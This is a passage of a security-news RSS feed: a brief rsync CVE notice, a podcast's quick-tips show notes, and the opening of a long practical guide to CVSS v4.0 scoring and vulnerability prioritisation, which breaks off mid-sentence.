<title><![CDATA[CVE-2025-10158 | rsync up to 3.4.1 File Transfer array index (Nessus ID 275743 / WID-SEC-2025-2637)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in rsync up to 3.4.1. The impacted element is an unknown function of the component File Transfer. The manipulation results in improper validation of array index.

This vulnerability is known as CVE-2025-10158. It is possible to launch the atta...]]></description>
<link>https://tsecurity.de/de/3403767/sicherheitsluecken/cve-2025-10158-rsync-up-to-341-file-transfer-array-index-nessus-id-275743-wid-sec-2025-2637/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3403767/sicherheitsluecken/cve-2025-10158-rsync-up-to-341-file-transfer-array-index-nessus-id-275743-wid-sec-2025-2637/</guid>
<pubDate>Thu, 02 Apr 2026 21:08:21 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/rsync">rsync up to 3.4.1</a>. The impacted element is an unknown function of the component <em>File Transfer</em>. The manipulation results in improper validation of array index.

This vulnerability is known as <a href="https://vuldb.com/source_cve/332791">CVE-2025-10158</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Pufferüberlauf in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3401426/it-security-nachrichten/pufferueberlauf-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3401426/it-security-nachrichten/pufferueberlauf-in-rsync-red-hat/</guid>
<pubDate>Thu, 02 Apr 2026 06:51:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[HPR4604: Quick Tips for January 20 26]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.
It's going to be pretty short, I'm going to go through my quick
tips. Looks like I've got enough to kind of do a little short
episode for you guys. Quick tips are basically just, you know,
kind of things that I think about, that add value, kind of ...]]></description>
<link>https://tsecurity.de/de/3381861/podcasts/hpr4604-quick-tips-for-january-20-26/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3381861/podcasts/hpr4604-quick-tips-for-january-20-26/</guid>
<pubDate>Thu, 26 Mar 2026 01:17:33 +0100</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>
<p>It's going to be pretty short, I'm going to go through my quick
tips. Looks like I've got enough to kind of do a little short
episode for you guys. Quick tips are basically just, you know,
kind of things that I think about, that add value, kind of like
those stupid viral videos on social media where they show, like
how to make a pancake with a square, like it, you know.</p>
<ul>
<li>Prevent messiness when making <a href="https://en.wikipedia.org/wiki/Matcha">Matcha</a></li>
<li>Baking soda and super glue to get an epoxy type of seal.</li>
<li>"Tile batter pad on top of speaker in middle" - even <a href="https://hackerpublicradio.org/correspondents/0036.html">operat0r</a> has no clue !</li>
<li>How to blowing out a candle</li>
<li>Request for more shows on <a href="https://en.wikipedia.org/wiki/Rsync">rsync</a> inspired by <a href="https://hackerpublicradio.org/eps/hpr4341/index.html">hpr4341 :: Transferring Large Data Sets</a> sent in by <a href="https://hackerpublicradio.org/correspondents/0436.html">hairylarry</a></li>
<li>How to make a foam machine</li>
<li>Fixing garden chairs by replacing the Vinyl straps</li>
<li>How to use a Fabric belt</li>
<li><a href="https://ytdlnis.org/">YTDLnis</a> Full Featured Downloader using <a href="https://github.com/yt-dlp/yt-dlp">yt-dlp</a>, available on <a href="https://f-droid.org/packages/com.deniscerri.ytdl">F-Droid</a></li>
<li>Use a wet paper towel over Microwave food.</li>
<li>Use <a href="https://en.wikipedia.org/wiki/Binder_clip">binder clips</a> instead of chip clips</li>
<li><a href="https://chromewebstore.google.com/detail/things-to-get-me/hikgojdlmopjpjfbmmpoleceddnhdjbi">Things To Get Me</a> since Amazon got rid of their add arbitrary item to wish list feature. </li>
</ul>
<p><a href="https://hackerpublicradio.org/eps/hpr4604/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVSS v4.0: The Practical Field Guide for Vulnerability Management]]></title>
<description><![CDATA[From a number that nobody trusts to a tool that changes how you workTable of ContentsIntroduction: CVSS Is a Tool, Not a ScoreWhat Changed in v4.0 — and Why It Mattersv3.1 vs v4.0: Side-by-Side with Real CVEsAnatomy of a CVSS v4.0 Vector StringThe Three Metric Groups ExplainedThe CVSS Lifecycle: ...]]></description>
<link>https://tsecurity.de/de/3379040/hacking/cvss-v40-the-practical-field-guide-for-vulnerability-management/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3379040/hacking/cvss-v40-the-practical-field-guide-for-vulnerability-management/</guid>
<pubDate>Wed, 25 Mar 2026 08:08:18 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>From a number that nobody trusts to a tool that changes how you work</em></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*B9qDekxyxZ4e_C-SbSYhgw.png"></figure><h3>Table of Contents</h3><ol><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#df46"><strong>Introduction: CVSS Is a Tool, Not a Score</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#cba8"><strong>What Changed in v4.0 — and Why It Matters</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#fa73"><strong>v3.1 vs v4.0: Side-by-Side with Real CVEs</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#54ab"><strong>Anatomy of a CVSS v4.0 Vector String</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#6d4b"><strong>The Three Metric Groups Explained</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#093c"><strong>The CVSS Lifecycle: CVSS-B → CVSS-BT → CVSS-BTE</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#fd22"><strong>A Practical Scoring Workflow: Why Many Teams Go from CVSS-B → CVSS-BE → CVSS-BTE</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#f779"><strong>Threat Metrics in Practice: KEV, EPSS, and Exploit Feeds</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#29f7"><strong>Environmental Metrics: Scoring for Your Environment</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#86e2"><strong>Worked Example 1: CVE-2021–44228 Log4Shell — Score Evolution Over 72 Hours</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#c13d"><strong>Worked Example 2: CVE-2025–32433 Erlang/OTP — From 10.0 to 5.9</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#a85e"><strong>Worked Example 3: Firmware Report — 18 Criticals Become Medium</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#3a97"><strong>Worked Example 4: CitrixBleed, MOVEit, FortiOS — Three Real-World Cases</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#391b"><strong>Industry-Specific Scoring: Healthcare, Finance, OT/ICS</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#391b"><strong>CVSS vs SSVC: When to Use Which</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#8630"><strong>The Practical VM Workflow: From Scanner Output to Prioritized Action</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#885e"><strong>CVSS v4.0 Enrichment Tool</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#4fea"><strong>CVSS as Regulatory Framework: The 5-Phase Maturity Model</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#0e98"><strong>Supplemental Metrics: The Overlooked Context Layer</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#aa55"><strong>The 8 Most Common CVSS Mistakes</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#3b76"><strong>Quick Reference Cheatsheet</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#0a5d"><strong>Tools and Resources</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#bdbf"><strong>Conclusion</strong></a></li></ol><h3>Introduction: CVSS Is a Tool, Not a Score</h3><p>Every security team has a vulnerability scanner. Every scanner produces a list with numbers. And almost every team treats those numbers as the truth — sorting by score descending, starting at 9.8, working down.</p><p>This is wrong. And CVSS v4.0 was designed to fix it.</p><p>The CVSS SIG (Special Interest Group), which maintains the standard at FIRST.org, makes this point explicitly in the Consumer Implementation Guide: <strong>the Base score is a worst-case estimate for an unmitigated system in a generic environment, produced by a vendor who has never seen your network</strong>. It is a starting point, not an answer.</p><h4>The 3–5% Problem</h4><p>According to CISA and multiple published threat intelligence studies, only <strong>3–5% of published CVEs have a known, functional exploit at any given time</strong>. The Exploit Prediction Scoring System (EPSS), maintained by FIRST.org, corroborates this: the median EPSS score across all published CVEs hovers below 0.05 (5% probability of exploitation within 30 days).</p><p>Yet the default CVSS calculation assumes a mature, weaponized exploit exists for every vulnerability. This means every score you see in your scanner — before you apply Threat and Environmental metrics — is calculated under an assumption that is false for 95–97% of CVEs.</p><h4>The Operational Consequence</h4><p>Consider a mid-size organization’s typical scanner output:</p><pre>Scanner report — typical enterprise environment:<br>  Total CVEs:        847<br>  Critical (9.0+):    94<br>  High (7.0–8.9):    203<br>With Base scores only, approximate remediation timeline:<br>  94 Critical × ~8 hours each = 752 analyst-hours<br>  203 High × ~4 hours each   = 812 analyst-hours<br>With Threat + Environmental enrichment (conservative estimate):<br>  ~5 true Critical (KEV or active exploit, exposed system): 40 hours<br>  ~22 true High (POC exists OR exposure without controls): 88 hours<br>Reduction: from ~1,564 analyst-hours to ~128 analyst-hours<br>- a 92% reduction in wasted effort</pre><p>CVSS v4.0 provides the mechanism to achieve this reduction. This guide shows you exactly how.</p><h3>What Changed in v4.0 — and Why It Matters</h3><p>CVSS v4.0 was released on November 1, 2023. The changes are more significant than any previous version update — v4.0 is effectively a redesign of the impact and temporal models.</p><h4>New Impact Model: Two Systems Instead of One</h4><p>The biggest structural change: CVSS v4.0 separates impact into two systems:</p><p><strong>Vulnerable System</strong> — the component directly compromised by the vulnerability (what the attacker hits first). <strong>Subsequent System</strong> — any system affected as a downstream consequence of exploiting the vulnerable system.</p><p>In v3.x, this distinction was handled through the vague “Scope” metric (Unchanged/Changed). In v4.0, it is explicit and granular:</p><pre>v3.1 impact metrics:<br>  C (Confidentiality): None / Low / High<br>  I (Integrity):       None / Low / High<br>  A (Availability):    None / Low / High<br>  S (Scope):           Unchanged / Changed<br><br>v4.0 impact metrics:<br>  VC (Vulnerable System Confidentiality): None / Low / High<br>  VI (Vulnerable System Integrity):       None / Low / High<br>  VA (Vulnerable System Availability):    None / Low / High<br>  SC (Subsequent System Confidentiality): None / Low / High<br>  SI (Subsequent System Integrity):       None / Low / High<br>  SA (Subsequent System Availability):    None / Low / High</pre><p><strong>Why this matters operationally:</strong> In v3.x, if an SSH daemon vulnerability only affects the single server it runs on, you score it Scope:Unchanged. If it can propagate to a database behind it, Scope:Changed. These two scenarios produced different base scores, but there was no way to capture <em>how much</em> the subsequent system was affected. In v4.0, you can score a vulnerability that fully compromises the immediate system (VC:H/VI:H/VA:H) but has only partial downstream confidentiality impact (SC:L/SI:N/SA:N) — a much more precise description of real-world attack chains.</p><h4>New Metric: Attack Requirements (AT)</h4><p>v4.0 adds <strong>Attack Requirements (AT)</strong> alongside Attack Complexity (AC). These two metrics were previously collapsed into one:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-B_wNZ8-J12IGCQN695TVw.png"></figure><p><strong>Real-world example:</strong> <a href="https://nvd.nist.gov/vuln/detail/cve-2022-26134">CVE-2022–26134</a> (Confluence OGNL injection):</p><ul><li>AC:L — exploitation is straightforward, no bypass required</li><li>AT:N — no special deployment preconditions; works against default installations</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9K7ZVsd6Yk6Y8t_cD1XOQQ.png"></figure><p>For <strong>AC:H / AT:N</strong> — a race condition where the attacker must actively win timing, but no special deployment condition is required:</p><p><strong>CVE-2024–6387 (OpenSSH “regreSSHion”)</strong> is a strong example. NVD describes it as a race condition in sshd that an unauthenticated remote attacker may trigger by failing authentication within a set time period. That maps well to <strong>AC:H</strong> because exploitation depends on hitting a narrow timing window, but <strong>AT:N</strong> because the race is part of the vulnerable code path itself, not dependent on a non-default deployment prerequisite.</p><p>Another reasonable example is <strong>CVE-2020–28049 (SDDM)</strong>. NVD states the issue is caused by a race condition during Xauthority file creation, where for a short time an unprivileged local user can connect to the X server before authentication is properly enforced. Again, that is naturally <strong>AC:H</strong> because the attacker must exploit a transient timing window, while <strong>AT:N</strong> fits because the weakness is intrinsic to the vulnerable startup behavior rather than requiring some extra deployment state.</p><p>For <strong>AC:L / AT:P</strong> — exploitation is easy once a particular non-default setup exists, but that setup is itself the precondition:</p><p><strong>CVE-2025–24813 (Apache Tomcat)</strong> is a very clean example. Apache and NVD both state exploitation requires <strong>“writes enabled for the default servlet (disabled by default)”</strong>. Once that condition is present, the exploit path is not about winning a race or overcoming complex defensive mechanics; the main hurdle is that the vulnerable deployment configuration must exist. That makes it a good fit for <strong>AC:L</strong> and <strong>AT:P</strong>.</p><p><strong>CVE-2021–45046 (Log4j 2.15.0)</strong> is another solid example. NVD explicitly says the issue appears only in <strong>certain non-default configurations</strong>, specifically when the logging configuration uses a non-default Pattern Layout with Context Lookup or Thread Context Map patterns. In CVSS v4 terms, that aligns with <strong>AT:P</strong> because the environment must be deployed in that specific way; once it is, the attacker’s path is comparatively straightforward, so <strong>AC:L</strong> is the better fit than AC:H.</p><p>A third example is <strong>Tomcat CGI Servlet RCE on Windows</strong> from the Tomcat security page. Apache states the <strong>CGI Servlet is disabled by default</strong> and the issue is exposed when enableCmdLineArguments is enabled. That is another textbook <strong>AT:P</strong> case: the risky deployment state must be present first.</p><h4>New Threat Metric: Exploit Maturity (E)</h4><p>The old v3.x Temporal metric group is now the <strong>Threat</strong> metric group, containing a single metric: <strong>Exploit Maturity (E)</strong>. The old Remediation Level and Report Confidence metrics were removed.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/608/1*Ztb_ZKPbhCx0XKTKyoRmvQ.png"></figure><p><strong>The E:X trap:</strong> When a CVE is published with no Exploit Maturity specified — which is the default from NVD and most scanners — CVSS v4.0 calculates as if E:A. If you have 500 CVEs and never set Exploit Maturity, you are treating all 500 as actively exploited. Setting E:U for CVEs with no exploit evidence is not optimism — it is accuracy.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/587/1*_T8ZhwZzVovfebnNGz6buw.png"></figure><h4>Cleaner Naming: CVSS-B, CVSS-BT, CVSS-BTE</h4><p>v4.0 introduces formal nomenclature for the scoring lifecycle. This naming is important for compliance documentation and vendor communication:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*87hv3fMjAi_z6OEP3aJvMA.png"></figure><h4>Supplemental Metric Group (New)</h4><p>A new optional group of metrics that provide <strong>context without affecting the score</strong>: Safety (S), Automatable (AU), Recovery (R), Value Density (V), Vulnerability Response Effort (RE), Provider Urgency (U). These allow vendors to communicate operational context that the numeric score cannot capture.</p><h3>v3.1 vs v4.0: Side-by-Side with Real CVEs</h3><p>Understanding the practical differences requires seeing the same vulnerability scored under both versions.</p><h4>Example A: Log4Shell (CVE-2021–44228)</h4><pre>CVSS v3.1 vector:<br>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H<br>Score: 10.0 Critical<br>CVSS v4.0 equivalent:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H<br>Score: 10.0 Critical<br>What changed: The "Scope:Changed" in v3.1 is now explicit as SC:H/SI:H/SA:H.<br>In v4.0, you can see exactly what the downstream impact is, not just that scope<br>"changed". Both scores are 10.0 - the difference is expressiveness.</pre><h4>Example B: PrintNightmare (CVE-2021–34527) — Where Scoring Complexity Matters</h4><pre>CVSS v3.1:<br>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br>Score: 8.8 High<br>CVSS v4.0:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H<br>Score: 9.8 Critical<br>Key difference: v4.0 scores the DOMAIN CONTROLLER scenario higher because<br>SC:H/SI:H/SA:H explicitly captures that compromising a domain-joined system<br>enables domain-level compromise (subsequent system impact).<br>In v3.1, Scope:Unchanged kept it at 8.8. In v4.0, if the subsequent system<br>(Active Directory) has high CIA impact, the score correctly reflects that<br>a low-privilege exploit can ultimately lead to domain domination.</pre><h4>Example C: A Local Privilege Escalation — Where v4.0 Scores Lower</h4><pre>Vulnerability: Local service running as SYSTEM, exploitable by authenticated user<br>No network access, no subsequent system impact.<br>CVSS v3.1:<br>CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br>Score: 7.8 High<br>CVSS v4.0:<br>CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N<br>Score: 7.3 High<br>v4.0 is more accurate: SC:N/SI:N/SA:N explicitly states that no downstream<br>systems are affected. This is a pure local privilege escalation with no<br>lateral movement potential.</pre><h4>Key Scoring Differences Summary</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*AeDfapt_NtvpGxFSIhyIGg.png"></figure><h3>Anatomy of a CVSS v4.0 Vector String</h3><p>The vector string is the machine-readable representation of all CVSS metric choices. It is the authoritative record of a vulnerability’s scoring.</p><h4>Full v4.0 Vector String Format</h4><pre>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H</pre><p>Breaking it down:</p><pre>CVSS:4.0          — version identifier (required prefix)<br>BASE METRICS (all 11 required - no omissions allowed):<br>  AV:N            - Attack Vector: Network (remotely exploitable)<br>  AC:L            - Attack Complexity: Low (straightforward)<br>  AT:N            - Attack Requirements: None (no preconditions)<br>  PR:N            - Privileges Required: None (unauthenticated)<br>  UI:N            - User Interaction: None (attacker acts alone)<br>  VC:H            - Vulnerable System Confidentiality: High (full disclosure)<br>  VI:H            - Vulnerable System Integrity: High (full modification)<br>  VA:H            - Vulnerable System Availability: High (full disruption)<br>  SC:H            - Subsequent System Confidentiality: High<br>  SI:H            - Subsequent System Integrity: High<br>  SA:H            - Subsequent System Availability: High<br>THREAT METRICS (optional - defaults to X which assumes A):<br>  E:A             - Exploit Maturity: Attacked (actively exploited)<br>ENVIRONMENTAL METRICS (optional - all default to X):<br>  CR:X / IR:X / AR:X  - Security Requirements (not defined = use vendor defaults)<br>  MAV:A           - Modified Attack Vector: Adjacent (overrides AV:N)<br>  MAC:H           - Modified Attack Complexity: High (compensating controls)<br>  MAT:X           - Modified Attack Requirements: Not Defined<br>  MPR:X           - Modified Privileges Required: Not Defined<br>  MUI:X           - Modified User Interaction: Not Defined<br>  MVC:X / MVI:X / MVA:X   - Modified Vulnerable System impact<br>  MSC:X / MSI:X / MSA:X   - Modified Subsequent System impact<br>SUPPLEMENTAL METRICS (optional - informational, no score effect):<br>  S:X             - Safety<br>  AU:Y            - Automatable: Yes<br>  R:X             - Recovery<br>  V:X             - Value Density<br>  RE:X            - Vulnerability Response Effort<br>  U:X             - Provider Urgency</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*90fOtR4kz1tjbBgJ5z-2rw.png"></figure><h4>Compact Form — Only Non-Default Values</h4><p>In practice, only include metrics that differ from “Not Defined” (X). A fully enriched vector for an isolated internal system with POC exploit:</p><pre>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/MAV:A/MAC:H</pre><p>The base metrics (all 11) are always required. Everything after that is optional and only included when set.</p><h4>Parsing the Vector Programmatically</h4><pre>def parse_cvss_v4_vector(vector: str) -&gt; dict:<br>    """Parse a CVSS v4.0 vector string into a dictionary."""<br>    if not vector.startswith("CVSS:4.0/"):<br>        raise ValueError("Not a CVSS v4.0 vector")<br>parts = vector[9:].split("/")<br>    metrics = {}<br>    for part in parts:<br>        if ":" in part:<br>            key, value = part.split(":", 1)<br>            metrics[key] = value<br>    return metrics<br># Example usage:<br>vector = "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/MAV:A"<br>parsed = parse_cvss_v4_vector(vector)<br># {'AV': 'N', 'AC': 'L', 'AT': 'N', 'PR': 'N', 'UI': 'N',<br>#  'VC': 'H', 'VI': 'H', 'VA': 'H', 'SC': 'H', 'SI': 'H', 'SA': 'H',<br>#  'E': 'P', 'MAV': 'A'}<br>exploit_maturity = parsed.get("E", "X")  # X = Not Defined (defaults to A)<br>attack_vector = parsed.get("MAV", parsed.get("AV"))  # Modified overrides Base</pre><h4>The Calculator</h4><p>The FIRST.org calculator at <a href="https://www.first.org/cvss/calculator/4.0">https://www.first.org/cvss/calculator/4-0</a> provides a visual interface. As you make selections, the vector string updates in real-time. Use the vector string as the authoritative record; use the calculator as the working interface.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BvpO2M7UW1eqiQnRJsnzug.png"></figure><h3>The Three Metric Groups Explained</h3><h4>Group 1: Base Metrics (Set by Vendor)</h4><p>Base metrics describe the intrinsic properties of the vulnerability itself, independent of time and environment.</p><p><strong>Exploitability Metrics — describe the attack path:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DpPm8CoS6x5CsUHC_ADcdQ.png"></figure><p><strong>Impact Metrics — what happens after a successful exploit:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ysB7U2l00IjRQCn4bobLrg.png"></figure><p><strong>Score Ranges (v4.0):</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9qLA02caf-NTGxC19_5VrA.png"></figure><h4>Group 2: Threat Metrics (Consumer + Threat Intel)</h4><p>Contains one metric: <strong>Exploit Maturity (E)</strong>.</p><p><strong>The most impactful single adjustment available.</strong> Setting E:U for a CVE with no public exploit can drop a 10.0 Critical to a 6–7 Medium/High — moving it from a 3am emergency to a scheduled maintenance window.</p><p><strong>Primary sources for Exploit Maturity determination:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vw79R12dK72SrGCLz3mZtg.png"></figure><ul><li><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA Known Exploited Vulnerabilities (KEV) Catalog</a></li><li><a href="https://www.first.org/epss/">FIRST.org Exploit Prediction Scoring System (EPSS)</a></li><li><a href="https://www.rapid7.com/products/metasploit/">Metasploit Framework</a></li><li><a href="https://www.exploit-db.com/">Exploit Database (ExploitDB)</a></li><li>GitHub Public Repositories (Search for CVE IDs directly)</li><li>Commercial Threat Intelligence (TI): Consult Recorded Future, Mandiant, or GreyNoise directly.</li></ul><h4>Group 3: Environmental Metrics (Consumer + Local Knowledge)</h4><p>Two sub-groups that let you encode what your security team knows about the actual deployment.</p><p><strong>Security Requirements (CR/IR/AR)</strong> — how important is CIA for this specific asset:</p><pre>High-criticality production payment API:<br>  CR:H / IR:H / AR:H  →  scores INCREASE relative to Base<br>  (This system is more important to protect than the vendor assumed)<br>Development test server (no real data, not customer-facing):<br>  CR:L / IR:L / AR:L  →  scores DECREASE relative to Base<br>  (This system is less important than the vendor assumed)</pre><p><strong>Modified Base Metrics (MAV, MAC, MAT, MPR, MUI, MVC, MVI, MVA, MSC, MSI, MSA)</strong> — override specific Base values to reflect actual deployment conditions. When a Modified metric is set, it replaces the corresponding Base metric in the score calculation:</p><pre>Vendor assumed: AV:N (any internet attacker)<br>Your reality:   MAV:A (system is behind a firewall, adjacent network only)<br>→ Score drops by ~1.5–2.5 points<br>Vendor assumed: AC:L (straightforward exploitation)<br>Your reality:   MAC:H (attacker must first bypass your MFA + VPN)<br>→ Score drops further</pre><h3>The CVSS Lifecycle: CVSS-B → CVSS-BT → CVSS-BTE</h3><p>FIRST.org describes CVSS v4.0 as a <strong>living score</strong> that matures as information becomes available. This lifecycle maps to organizational maturity and regulatory requirements.</p><pre>┌────────────────────────────────────────────────────────────────-──┐<br>│                    CVSS SCORING LIFECYCLE                         │<br>│                                                                   │<br>│  VENDOR PUBLISHES                                                 │<br>│  ┌─────────────┐                                                  │<br>│  │  CVSS-B     │  Base metrics only                               │<br>│  │  (Worst     │  → Published in NVD, CVE records                 │<br>│  │   Case)     │  → Generic, deployment-independent               │<br>│  │  e.g. 9.8   │  → Produced by vendor/researcher                 │<br>│  └──────┬──────┘                                                  │<br>│         │  Add Threat Intelligence (CISA KEV, EPSS, ExploitDB)    │<br>│         ▼                                                         │<br>│  ┌─────────────┐                                                  │<br>│  │  CVSS-BT    │  Base + Exploit Maturity                         │<br>│  │  (Current   │  → "Is this being exploited right now?"          │<br>│  │   Reality)  │  → Uses CISA KEV, EPSS, Metasploit, ExploitDB    │<br>│  │  e.g. 7.4   │  → Produced by consumer with threat intel        │<br>│  └──────┬──────┘                                                  │<br>│         │  Add Environmental Context (your network/data/controls) │<br>│         ▼                                                         │<br>│  ┌─────────────┐                                                  │<br>│  │  CVSS-BTE   │  Base + Threat + Environment                     │<br>│  │  (Your      │  → "How bad is this here, for us, today?"        │<br>│  │   Reality)  │  → Uses asset inventory, network topology,       │<br>│  │  e.g. 4.2   │     compensating controls, CIA requirements      │<br>│  └─────────────┘  → Produced by consumer security team            │<br>│                                                                   │<br>│  DECISION: Patch/Mitigate timeline based on CVSS-BTE severity     │<br>└─────────────────────────────────────────────────────────────────-─┘</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KHLh-trhN14bpEr3yK0z0w.png"></figure><p><strong>Practical implementation path:</strong> You do not need to achieve CVSS-BTE overnight. Start with CVSS-B (vendor score from NVD). Add Threat metrics when you have a threat intel program (CVSS-BT). Add Environmental metrics as you build asset inventory and network documentation (CVSS-BTE). Each layer improves decision quality.</p><h3>A Practical Scoring Workflow: Why Many Teams Go from CVSS-B → CVSS-BE → CVSS-BTE</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jyrczXiPUvm7eSD8eIaqbA.png"></figure><p>The formal CVSS v4.0 framework defines four valid score sets: <strong>CVSS-B</strong>, <strong>CVSS-BT</strong>, <strong>CVSS-BE</strong>, and <strong>CVSS-BTE</strong>. Each one serves a distinct purpose, and each one reflects a different level of contextual enrichment.</p><p>At the specification level, it is easy to think of scoring as a neat progression from <strong>Base</strong> to <strong>Base + Threat</strong> to <strong>Base + Threat + Environmental</strong>:</p><p><strong>CVSS-B → CVSS-BT → CVSS-BTE</strong></p><p>That sequence is formally correct.</p><p><strong>But in real vulnerability management operations, many teams do not actually work in that order.</strong></p><p>In practice, the more operationally useful path is often:</p><p><strong>CVSS-B → CVSS-BE → CVSS-BTE</strong></p><p>The reason is simple: in most organizations, <strong>environmental context is available immediately</strong>, while <strong>threat context often matures later</strong>.</p><p>When a new CVE is disclosed, you may not yet have reliable answers to threat-related questions such as:</p><ul><li>Is public exploit code available?</li><li>Is exploitation merely theoretical, or already practical?</li><li>Has the vulnerability been weaponized?</li><li>Is it being used opportunistically, selectively, or at scale?</li><li>Has it appeared in KEV, exploit feeds, or credible threat reporting?</li><li>Is there confirmed in-the-wild activity, or only early speculation?</li></ul><p>Those answers often arrive later — sometimes hours later, sometimes days later, and sometimes only after the vulnerability has already entered active exploitation cycles.</p><p>By contrast, your organization usually knows its own environment <strong>immediately</strong>.</p><p>The moment the CVE appears, you often already know:</p><ul><li>whether the affected asset is internet-exposed or reachable only internally</li><li>whether it sits in production, staging, development, or an isolated lab</li><li>whether the vulnerable service is accessible by untrusted users</li><li>whether segmentation, VPN-only access, jump hosts, WAFs, or other compensating controls reduce practical exposure</li><li>whether the affected system is business-critical, safety-relevant, or low-impact</li><li>whether downstream confidentiality, integrity, availability, or operational consequences actually matter in your environment</li><li>whether exploitation would affect a crown-jewel system or a low-value supporting component</li></ul><p>That means the <strong>Environmental</strong> dimension is often the first real opportunity to replace vendor-neutral worst-case assumptions with organization-specific reality.</p><p>In other words, many teams can move from <strong>Base</strong> to <strong>Base + Environmental</strong> on day one, even if threat intelligence is still incomplete.</p><p>That is why, in 